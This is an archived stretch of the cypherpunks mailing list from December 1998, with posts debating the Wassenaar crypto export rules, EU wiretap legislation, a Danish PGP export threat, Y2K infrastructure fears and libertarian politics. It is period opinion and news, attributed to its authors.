    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Dec 1998 22:03:52 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <91301833500932@cs26.cs.auckland.ac.nz>
Message-ID: <199812071331.IAA23674@smtp2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Gutmann may be close to the truth about Echelon's role
in the Wassenaar changes.

The NYT reports today that the US is proposing to NATO a
combined intelligence center to combat use of Weapons of Mass
Destruction by rogue states and non-state terrorists like Usama
Bin Laden.

There is some dissent among the Europeans over the US's
attempt to frighten the populace with a new worldwide menace
to replace the boogies of the Cold War.

Still, it appears that intelligence on the threat of terrorist use of 
WMD is being whispered in ears of those holding out for
privacy protection. And a correlative threat of strong encryption
is surely part of those scenarios.

As in the US, it's probable that domestic restrictions on strong
crypto are being advanced to combat domestic terrorism in countries
around the world, following the precedent set during the Cold War,
which, as we all know was the evil parent of Wassenaar's predecessor
COCOM.

GAO put out a report (GGD-99-7) a few days ago on the FBI's 
expenditures for counterterrorism from 1995-98. It shows a dramatic 
increase year by year, with big leaps authorized by Congress following 
each "terrorist incident," for funds for a host of domestic agencies. 
GAO wonders (as does Congress which asked for the report) if it's 
all being put to beneficial effect. Its description of CT activities
carefully 
excludes the classified, and also omits the global efforts of US military 
-- not least of which is its vast intelligence apparatus, tidbits of which 
are surely being tossed to the Wassenaar puppies to get them to
go along with the Terrorism War Machinery.

The NYT has been running a series on how long the TLAs and military
have been tracking Usama Bin Laden (at least since 1991, maybe longer). 
It appears that if he did not exist he would have to be invented for the 
counterterrorism agenda. It's even possible that Bin Laden is their invention,
cultivated, strung along, not arrested, for that purpose. The African bombings
were probably preventable, and it will be interesting if Congress lets this
possibility go uninvestigated.

More interesting to Americans, maybe, is that there also appears to be
an effort to boost domestic militia, particularly the religious brand, as the
homefront Bin Laden. The rise of religion-based terrorism is explored at
length in Bruce Hoffman's recent "Inside Terrorism." Hoffman claims that
religious terrorists may be the worst enemies ever, for they do not 
believe in political compromise: they want to kill every single opponent,
and have no reservations about using WMD.

If this theory is correct (and Hoffman has worked with RAND for years on
the issue) then the menace of terrorism is worse than that hawked during
the Cold War. The enemy is not distant, not even ICBM seconds away,
but rather it lives amongst us, it's our neighbors readying Armageddon not
merely a familiar commie takeover. 

Hoffman says to expect more OKCs around the globe. To be sure, that's
his business to say that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 8 Dec 1998 00:36:18 +0800
To: jya@pipeline.com>
Subject: RE: What was the quid pro quo for Wassenaar countries?
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F85FD@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



John Young talked about the way the TLAs are whipping up the War Against
Drugs and the threat od  terrorists,  WMDs and bogies (in English slang
"bogies" are little bits of partially dried snot that plug up your nose...
but  that's by-the-by) and concludes with:

[... If Bruce Hoffman is right ...]

> then the menace of terrorism is worse than that hawked during
> the Cold War. The enemy is not distant, not even ICBM seconds 
> away, but rather it lives amongst us, it's our neighbors readying
> Armageddon not merely a familiar commie takeover. 

Ambulance Driver: "Yeah, Doc, there was a nasty accident out on the
interstate."

Dr. Bassett: "Bad one, eh?"

Ambulance Driver: "Yeah, a truck and a car collided. Ya know, it was kinda
funny... the truck was carrying a load of the strangest-looking seed pods."

Ken Brown





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Tue, 8 Dec 1998 01:45:15 +0800
To: cypherpunks@cyberpass.net
Subject: Anguilla attached to Wassenar Agr?
Message-ID: <Pine.SOL.3.91.981207095743.22705A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



Since Anguilla is a UK protectorate, is it subject
to Wassenar Agreement rules if the UK is a signatory?

Anyone care to predict the next big crypto exporter?

Brazil?

Chile?

Argentina?

Columbia?

Tonga? ;-)

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Dec 1998 23:57:14 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Wassenaar News
Message-ID: <199812071515.KAA26956@smtp2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We spoke with Igor at the WA today to ask about the implementation
report Caspar Bowden said would be coming shortly. It seems that 
Dirk Weicke, the person preparing it (whom Caspar queried), 
is out sick and won't return to work until Thursday.

Another person working on the report, a Mr. Sidbitt (?) is also
out sick but should be back at work tomorrow.

At the moment there is no plan to offer the report on the WA
Web site. Each member will decide how to publicize it.

Igor, a friendly, reminded that the WA staff has no authority,
indeed has an evanescent existence, and is subject to vanishing
without explanation. The paranoid WA members, my words, cut 
no slack, cut-throat control of perfidious news is their modus 
operandi.

Still, Igor chuckled at my reporting that the perfidious USG will not 
anwser my inquiries, being unable to trust its terrifying citizenry. 
He refused my plea to send a purloined report, a report which,
on the evidence, appears to be quite sickening.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 00:41:44 +0800
To: cypherpunks@cyberpass.net
Subject: Corporate Mandarins and The Tyranny of *Hierarchy* (was: tyrannyof corporations (was: Corporate Nations))
In-Reply-To: <v04003a00b290e4af9eda@[24.1.50.17]>
Message-ID: <v04020a1ab2918160bd4e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:44 PM -0500 on 12/6/98, Steve Schear wrote:


>  whereupon she said that my profile was an exact match with those who
>reach the highest levels of the corporate world. Then the bad news, its
>also the profile of a master criminal. I kid you not.

What a canard, Steve. I hope you don't actually believe it.

That sounds to me more like a romantic leftist sociological
pseudoscientific fantasy (I know, quintuply redundant :-)) about what it
takes to run a large business than any actual scientific observation of
human behavior.


This "sociological" analysis probably went over really well at a
touchy-feely corporate navel-gazing camp because it's more the way some
grey-flannel men *wish* they were, than the way they actually are. Thus the
prevalence on business bookshelves of titles like Machiavelli's "The
Prince", or Sun Tsu's "Art of War", or actual dreck like, I don't know,
"Accounts Receivable Secrets of Genghis Kahn", or something.


The fact is, people who've *built* very large businesses more or less from
scratch, like Sam Walton and Hugh Heffner, or even "criminals" like
Rockefeller and Gates, even people who took daddy's money and made it
outrageously larger, like J. Pierpont Morgan, Ned Johnson and Malcolm
Forbes, are no more criminal in their intent, much less behavior, than my
77 year-old mother is. Like any real entrepreneur, from junkyard owner to
dry-cleaner, these people are just motivated, and they work very hard at
something they like. The size of someone's success in building a business
is certainly more a function of brains -- and maybe a smidgeon of luck --
than brutality or ruthlessness.


Most senior corporate *managers*, on the other hand, especially those at
the top, are much more like blue-button mandarins than Genghis Kahn. They
got there by facilly regurgitating the modern version of Confucian Analects
back to their teachers, from kindergarten all the way through business and
law school. Actually working hard would break their long fingernails.

And, please, don't a confuse the time these mandarins spend at the
Emporor's court with hard work, as most very high-level "meetings", like
the corporate "retreat" above, are social functions in disguise -- parties,
in other words. As a result, these modern mandarins would rather fantasize
themselves as murderous feudal aristocrats -- or, more laughably, as the
modern equivalent in organized crime -- to justify their existance, or more
realisticaly, to relieve the tedium of supervising an enormous enterprise
which usually makes much more money simply by leaving it alone than it does
when actively "managed" or "regulated".


"Greed, for the lack of a better term, is good", as Oliver Stone
sarcastically said, damning progress with typical leftist Luddite faint
praise. Yet, as Russell observed, leftist ideology [like Luddism] is just
fuedalism's response to industrial progress. In that light, it makes much
more sense to actually take Mr. Stone at his word, and ignore his
post-modern "subtext".


So, money and power begets envy. So, what else is new?  People who can, do.
Those who can't, teach Sociology and call those who can "criminals", much
to the titilation of their customers in senior corporate management.
Meanwhile, the only *real* criminal activities, force and fraud, are *bad*
for business. Ask anyone living in Afganistan or Bosnia, or in North Korea
or Iraq, or, within recent memory, in inner-city Boston or Chicago.


Fortunately for us, the time is coming when people who invent *new* ideas
will make more money and have considerably more aggregate power than people
who live at the top of, or even those who create, large hierarchical
organizations in order to finance, and market, and, eventually, regulate,
*old* ideas.

And, since society can axiomatically produce literal swarms of people who
are creative and inventive, all in their own specialties, many more than it
can a few mandarin senior managers and politicians at the top of very large
hierarchical organizations, "power" itself, the ability to use force, or
more recently, fraud, to coerce or extort behavior from someone else, will
become much more diffuse. Except, that is, on occasions when almost
everyone, probably using a market to do so, agrees on what must be done.
And, anyone who's watched the capital markets lately knows how fast a
market can act when the time comes.


The reason for this change is simple. If infinitely-replicable information
becomes more important than finite land or machinery, and, more to the
point, if *new* information can be auctioned, for cash, at a higher price
than old information, instantaneously, recursively -- and anonymously --
across an increasingly geodesic network, then the power, the very *glamour*
of hierarchy -- and the snycophant court jesters it creates, like the
aforementioned "corporate sociologist" -- will be as dead as Sun Tsu's
middle-kingdom warlords, or Machievelli's renaissance princes.

Or, more properly, Ming-dynasty blue-button mandarins.


Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 8 Dec 1998 03:52:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Corporate Mandarins and The Tyranny of *Hierarchy*
Message-ID: <366C248D.2066@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> This "sociological" analysis probably went over really well at a
> touchy-feely corporate navel-gazing camp because it's more the way
> some grey-flannel men *wish* they were, than the way they actually
> are. 
>
Take a look at the history of the Love Canal in Buffalo, NY or the
tobacco industry and think about these as models of corporate behavior
when you hire the exterminator to come onto your property to take care
of some pesky ants and horribly nasty, dangerous spiders using "safe,
environmentally sound" insecticides. The burden of proof is backwards
all too often in evaluating the manner in which corporations treat their
customers and their community. It sure looks like the corporate world
has more than its fair share of major criminals to me: some of them
firmly and respectably in place in Congress. They just don't hack little
girls to pieces and bury them in the woods; they kill tens of thousands,
slowly, and hide behind the finest suits and the sharpest lawyers.

The quest for economic gain coupled with the blatant disregard for the
health and safety of those around you is what is meant by
hyperindividualism. It's simply greed coupled with sociopathy.
Describing this as an offshoot of 20th century liberalism is way beyond
me. 

> or even "criminals" like Rockefeller ...
>
This is well off-thread but I saw a movie clip of John D. from the mid
40's where he was at a podium being fingerprinted as a publicity bit to
promote the FBI's policy of trying to fingerprint all Americans. Nothing
new under the sun eh?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 8 Dec 1998 00:47:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
Message-ID: <D104150098E6D111B7830000F8D90AE84DDFB6@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



As a former New Yorker, I find this whole
thread majorly uninformed.

Most of New York's water moves from the 
Catskills to the tap (or toilet) via
gravity, without encountering a pump
at any point during the way. Even if
all power and automated controls
failed, most of the city would continue 
to get water (remember - the system was
designed long before computers, or even
widespread electricity).

The only areas with major problems would
be the high spots - Washington Heights/ 
Spanish Harlem, some parts of the Bronx,
and the upper floors of some highrises. 

Even assuming that somehow every toilet
in the city became unusable, the decidedly
lowtech solid waste disposal system (trucks
to landfills in Staten Island and New Jersey, 
or barges to the Atlantic), would still operate.
The  solid volume of people's excrement is 
miniscule compared to the volume of material 
already handled. (If you think no crap goes 
into the system, you clearly have not spent 
time near in infant in the age of Pampers).

I suspect that Los Angeles, and other cities
which have grown recently in arid areas, would
have a lot more trouble.

Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@stallion.ee>
Date: Mon, 7 Dec 1998 18:31:38 +0800
To: cryptography@c2.net
Subject: RE: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <000e01be200d$d7be9e10$8007a8c0@russell.internal>
Message-ID: <Pine.GSO.4.00.9812071148370.28156-100000@stal-gw.stallion.ee>
MIME-Version: 1.0
Content-Type: text/plain




I wonder what effect the Wassenaar politics have to non-member countries
of that agreement and how much those other countries support these US
crypto regulations? As I understand Wassenaar is mostly meant for export
of dual-use goods, not so much internal use although that is somewhat
regulated also. If that is the case, we still have many countries left
producing strong cryptography which can export it pretty freely. That is a
great export potential for those countries, only US used to be out of the
world crypto software market, now that there are 22 other countries, it is
just great news.

Estonia, Latvia and Lithuania fortunately are not members of the Wassenaar
agreement. And then we have places like most of Asia, Africa and South
America.

Jyri Kaljundi
jk@stallion.ee
AS Stallion Ltd
http://www.stallion.ee/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 8 Dec 1998 05:39:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [Fwd: y2k/gary north delusions]
In-Reply-To: <199812042341.RAA18742@manifold.algebra.com>
Message-ID: <v04011701b291be28bde1@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:10 AM -0500 12/5/98, Soren wrote:
>Igor Chudov @ home wrote:
>> Well... The answer is that there is much less washing needed for
>> survival than it is needed for day to day civilized American life.
>> For instance, I change my shirts every day. If shit hits the fan,
>> you can wear a shirt for two weeks. Similar story is with other
>> clothes.
>This is a good one.  What about the other half of American life (the
>uncivilized?). You know, the americans who live in those old
>refrigerator cartons? The ones that nobody sees?  I think they get more
>than 2 weeks out of their shirts.
>The sad fact is that city brats haven't got the faintest idea what
>survival is all about  (you mean I have to *walk* to the supermarket?).
>It was in the 1890's when Queen Victoria issued an edict that forced all
>the english to 'bathe at least once a year'.
>Sit back and enjoy the carnival.

	What was tbe average life expectancy in Victorian England?

	Those "other half" (more like other .05%) who live in refridgerator
cartons regularly clog up ER's with gangrenous wounds, stinking of filth
and decay. They tend not to live too long like that. Many of them also get
a hot shower at least once a week from a homeless shelter.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 8 Dec 1998 05:36:03 +0800
To: "William H. Geiger III" <mah248@nyu.edu>
Subject: Re: y2k/gary north delusions
In-Reply-To: <36694C23.B4CB9509@nyu.edu>
Message-ID: <v04011702b291bf16f5c7@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:10 AM -0500 12/5/98, William H. Geiger III wrote:
>In <36694C23.B4CB9509@nyu.edu>, on 12/05/98
>   at 10:07 AM, Michal Hohensee <mah248@nyu.edu> said:
>
>>Then we're back to doing it in the open.  Less concentrated cities might
>>last a while longer, but not much longer.  There's no getting around it,
>>we *need* working sewer systems to have modern cities.  Otherwise, the
>>cities die.
>
>And you say this as if it is a bad thing.

	When the cities start dying, their population--hungry and
diseased--is heading your way. Some of them armed. Some ex-soldiers, some
ex-cops.

	You may be badder than most of them, but are you good enough to
kill them all?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 8 Dec 1998 02:32:38 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: RE: tyranny of corporations (was: Corporate Nations)
Message-ID: <199812071632.LAA001.17@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <3.0.3.32.19981207161424.006ae900@209.204.247.83>, on 12/07/98 
   at 12:17 PM, "Albert P. Franco, II" <apf2@apf2.com> said:

><fontfamily><param>Arial</param><color><param>0000,0000,ffff</param><smaller>

Please set Eudora so it does not output this junk in your messages.

tks,

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 04:06:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <D104150098E6D111B7830000F8D90AE84DDFB6@exna02.securitydynamics.com>
Message-ID: <v04020a27b291cf240547@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:07 AM -0500 on 12/7/98, Trei, Peter wrote:


> I suspect that Los Angeles, and other cities
> which have grown recently in arid areas, would
> have a lot more trouble.

Actually, Mulholland knew what gravity was, as well. :-).

Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Mon, 7 Dec 1998 20:50:00 +0800
To: cypherpunks@toad.com
Subject: NEW Reuters story (fwd)
Message-ID: <Pine.LNX.3.96.981207134858.17984E-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sat, 5 Dec 1998 23:50:55 +0000
From: Dave Bird <dave@xemu.demon.co.uk>
Reply-To: ukcrypto@maillist.ox.ac.uk
To: ukcrypto@maillist.ox.ac.uk
Subject: NEW Reuters story

In article <896C7C3540C3D111AB9F00805FA78CE2013F85F3@MSX11002>, Brown, R
Ken <brownrk1@texaco.com> writes
>r
   [sent to crytpo list, and to CIV LIBS DISCUSS]

Yahoo! News
http://dailynews.yahoo.com/headlines/wr/story.html?s=v/nm/19981203/wr/
privacy_1.html
Thursday 3 December 1998 12:38 PM ET

Europe readies police techno-surveillance law

By Niall McKay

SAN FRANCISCO (Wired) - The European Union is quietly getting ready to
approve legislation that will allow the police to eavesdrop both on
Internet conversations and Iridium satellite telephone calls without
obtaining court authorization.

The legislation is part of a much wider memorandum of understanding
between the EU, the United States, Canada, New Zealand, and Norway, a
nonmember European nation. That agreement allows authorities to conduct
telecom surveillance across international borders, according to a
Europol document leaked to members of the European Parliament.

``Security measures are often necessary in the cases of terrorism or
organized crime,'' said Glyn Ford, a member of the European Parliament
for the British Labour Party and a director of the EU's Civil Liberties
and Internal Affairs Committee. ''But what we need is some sort of
democratic control. It seems to me that many security services are a law
unto themselves.''

That will presumably be a topic of discussion when the European Council
of Ministers meets behind closed doors Thursday to update a 1995 wiretap
agreement known as the Legal Interception of Telecommunications
Resolution.

If approved, it would permit real-time, remote monitoring of email, as
well as of calls placed on satellite telephone networks such as those
maintained by Iridium and Globalstar. Unlike most laws in Europe, the
agreement will allow law enforcement to listen in without a court order.

``This is a US export,'' said Marc Rotenberg, director of the Electronic
Privacy Information Center. ``It's a European version of the
Communications Assistance for Law Enforcement Act.'' The act,
passed in 1984, was intended to allow law enforcers to tap the digital
lines of tomorrow, just as they tap analog phone lines now.

Ironically, in September, the European Parliament called for account-
ability of Echelon, the US National Security Agency's spying network
that is reportedly able to intercept, record, and translate any
electronic communication-telephone, data, cellular, fax, email, or
telex.

Under European law, representatives of each member nation can pass
legally binding resolutions. Further, the resolutions don't require the
approval of either the European Parliament or the individual parliaments
of EU members.

Many European Parliament members are outraged that the Council of
Ministers has been acting in secret. They are especially concerned about
the inclusion of non-EU nations in the agreement.

Patricia McKenna, a representative for Britain's Green Party, will raise
the issue in Parliament this week. She also intends to ask Europe's
Justice and Internal Affairs Council to ''justify the secrecy and lack
of consultation surrounding these initiatives.''

McKenna is requesting what she described as an ``open debate on the
crucial and far-reaching measures, with enormous potential impact in the
realm of privacy.''

Another member of the European Parliament believes that the so-called
``update resolutions'' will have staggering implications for personal
privacy.

``This legislation is not just a technical update,'' said Johannes
Voggenhuber, an Austrian representative for the European
Parliament. ``It places the onus on the telecommunications carrier to
provide a watertight back door to police.''

The European Council for General Security prepared the amendment with
technical assistance from the FBI, according to the Europol document
leaked.

The four major satellite telephone operators-Iridium, Globalstar,
Odyssey, and ICO-will be required by the law to provide access to
European law enforcement through ground stations in France, Italy,
England, and Germany.

Iridium officials could not be reached for comment.

It is unclear how the memorandum of understanding will affect US
citizens.

``I find it very hard to believe that a foreign nation-any foreign
nation-could eavesdrop on US citizens,'' said John Pike, a
security analyst with the Federation of American Scientists.

``It's one thing for the FBI to try and track terrorists across
international borders, but it's entirely another to let Europeans
tap US citizens' telephones.''

The FBI would neither confirm nor deny any relationship between the
United States and the other nations involved in the memorandum of
understanding. However, Rotenberg said such provisions are already in
place under the 1994 Communications Assistance for Law Enforcement Act.

While the new European law is being sold to EU member states as a means
of combating what the legislation calls ``serious and organized'' crime,
there is no clear definition of this phrase.

``It simply concerns any punishable offense,'' said Tony Bunyan,
director of Statewatch, a European civil liberties group.

(Reuters/Wired)

                                            |~/           |~/
~~|;'^';-._.-;'^';-._.-;'^';-._.-;'^';-._.-;||';-._.-;'^';||_.-;'^'0-|~~
P |      Woof Woof, Glug Glug               ||____________||      0  | P
O |   Who Drowned the Judge's Dog?          | . . . . . . . '----. 0 | O
O |         answers on                  *---|_______________  @__o0  | O
L |{a href="news:alt.religion.scientology"}{/a}_____________|/_______| L
and{a href="http://www.xemu.demon.co.uk/clam/lynx/q0.html"}{/a}XemuSP4(:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 8 Dec 1998 05:37:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <366A26C2.30D6892E@nyu.edu>
Message-ID: <v04011703b291d39dc7f5@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:09 PM -0500 12/6/98, William H. Geiger III wrote:

>Large metropolitan complexes are obsolete and their problems greatly
>outweigh their benefits. I am a land owner and *like* owning land, I enjoy
>having grass and trees, streams to fish and swim in, not living in a cage
>with my neighbors on the other side of a paper thin wall. I have enough
>land that I could plow it up and do subsistence farming to survive if the
>collapse ever comes (subsidized with fishing and hunting).
>
>Why anyone would want to live like a rat is beyond me.

	All night grocery stores within walking distance.

	Ready access to work and entertainment.

	10 different "ethnicities" of restraunts within walking distance
(if you consider "all night diner" to be an "ethnicity").

	Decent Mass Transit.

	Very little Country Music on the radio, and NO hog reports.

	Oh, and I haven't owned a car in 6 years.

	I don't really _like_ living in Chicago, but I'd like living in the
middle of BFE even less.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 04:18:15 +0800
To: cypherpunks@cyberpass.net
Subject: Export of PGP Illegal in Denmark. Threatened w. jail (fwd)
Message-ID: <v04020a2cb291de81a209@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Mon, 7 Dec 1998 08:05:05 -0800 (PST)
From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
To: Cryptography List <cryptography@c2.net>
Subject: Export of PGP Illegal in Denmark. Threatened w. jail (fwd)
Organization: NASA Jet Propulsion Laboratory
X-No-Archive: yes
X-PGP-Notice: E-mail me for my PGP Public Key.
X-Disclaimer: Opinions expressed here are not necessarily those of
NASA/JPL/Caltech.
X-To-Spammer: Spamming a U.S. Government institution will only get you a
$500 per incident fine.
MIME-Version: 1.0
Sender: owner-cryptography@c2.net

-----BEGIN PGP SIGNED MESSAGE-----

Courtesy of Defcon Stuff.

(Do I hear jackboots in the night?  'Deed I do!)

Sorry, Uncle Sam.  I'm a fan of cryptography, not crippletography.

- ---------- Forwarded message ----------
Date: Mon, 07 Dec 1998 13:45:17 +0100
From: "boo@datashopper.dk" <boo@Datashopper.Dk>
To: dc-stuff@dis.org
Subject: Export of PGP Illegal in Denmark. Threatened w. jail

Hi
This is a true story. Denmark now - along with the whole EU - has
assimilated US-crypto laws.
I just had a phone conversation with the danish ministry of commerce,
the export control division. The kind lady I spoke to threatened me with
fines or jail for up to two years.

For having PGP for free download on my homepage!

I called the division to hear about the Wassenaar arrangement on
export-restrictions on strong crypto and its consequences. So I ask this
lady something like: I have this strong crypto program called PGP on my
homepage. What should I do. Does this Wassenaar arrangement concern me?
	'It sure does', she replies, and start to ask a lot of questions about
my homepage - does it have unlimited global access etc. And then she
says: 'You better take it down', and starts to reiterate the legal
aspects, e.g. two laws from EU on export restrictions.
	Specifically she points out the penal code: Fines. Jail.
	So...
	I'm _not_ going to take down PGP voluntarily. Otoh I'm going to SHOUT
this out loud. (I have already contacted two members of parliament and
will start calling all 179 later today.)
	Lets see what happens...

- --
Boo
PI = int a=10000,b,c=2800,d,e,f[2801],g;main(){for(;b-c;)f[b++]=a/5;
for(;d=0,g=c*2;c-=14,printf("%.4d",e+d/a),e=d%a)for(b=c;d+=f[b]*a,
f[b]=d%--g,d/=g--,--b;d*=b);}

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNmv8uLl5qZylQQm1AQGYPQQAhDs8XfKRLD0ECTO5LuF1iA+0Yr7B9Yon
CAnKwZYAk07BYG2u/xuFEsU/xdoNTap+lVmWEwciREPL+wjF/hSWeq+/YP6uwpCb
9pkoXkMst2NnFQ6744GTYiRJMQPc4no6aaDzWwO4FnMjyIzUpD4kBPkh0MHutCAF
PyXXbstG1z8=
=ByGn
-----END PGP SIGNATURE-----

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Dec 1998 06:00:05 +0800
To: "Albert P. Franco, II" <cypherpunks@cyberpass.net
Subject: Re: Vengeance Libertarianism
In-Reply-To: <3.0.3.32.19981205220239.006a17c8@209.204.247.83>
Message-ID: <4.0.2.19981207142627.00c9eb30@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Many libertarians would not object if local state law punished rapists or
burglars by sending them to prison with labor requirements.

So if it is an acceptable punishment in principle, the question then
becomes who should qualify.

The problem with Tim's analysis is that if we extend the punishment to
anyone who's benefited from government tax-n-spending that libertarians
oppose, it's hard to find anyone *not* to put in the workcamp. Anyone who
takes advantage of public transportation (like the Metro here in DC), or
federally-funded interstates, etc. could conceivably qualify. And what
about all those folks with unconstitutional federal student loans?

And fundamental fairness principles suggest that punishment should not be
limited to welfare for individuals. Why shouldn't corporate welfare qualify?

Tim owns substantial shares of Intel Corp. stock, and Intel is a prime
beneficiary of corporate welfare. Check out last month's Time magazine
cover story at: http://www.time.com/magazine

Should just the directors of Intel, or also the shareholder owners be
punished?

A more moderate approach that seems more logically consistent might be to
limit punishment to state actors and agents (assuming you agree with this
concept of vengeance to begin with). There's a big difference between an
FBI agent engaging in what he might occasionally suspect to be
unconstitutional searches and busts and someone who picks up an occasional
unemployment check.

-Declan



At 10:02 PM 12-5-98 +0100, Albert P. Franco, II wrote:
>Tim must be having a "bad hair" day. He actually mentioned sending people
>to Labor Camps. That sounds so UN-Libertarian, I have to chuckle. I'm
>chuckling because I wouldn't want to think you actually believe in this
>very Hitleresque rant.
>
>Or is some FED spoofing Tim and sending "threatening" material in his name?
>In which case...lock and load, Tim. They're coming to get you!
>
>APF
>
>>and, have drifted into the camp I will dub "the vengeance
>>libertarians." Summarized, roughly, as:
>>
>>"You've stolen my property, you've imprisoned my friends, you've passed
>>laws making us all criminals, you've started wars to enrich your
>>military-industrial complex friends, and you're corrupt bastards. You can
>>forget about some kind of "libertarian amnesty." It's going to be payback
>>time, with at least hundreds of thousands of statist judges, politicians,
>>cops, soldiers, and other such persons going to the gallows. Payback time.
>>Welfare recipients are going to have to pay back all that they have stolen,
>>with compounded interest. Out of their pockets, or while in labor camps.
>>Payback time."
>>
>>
>>--Tim May
>>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
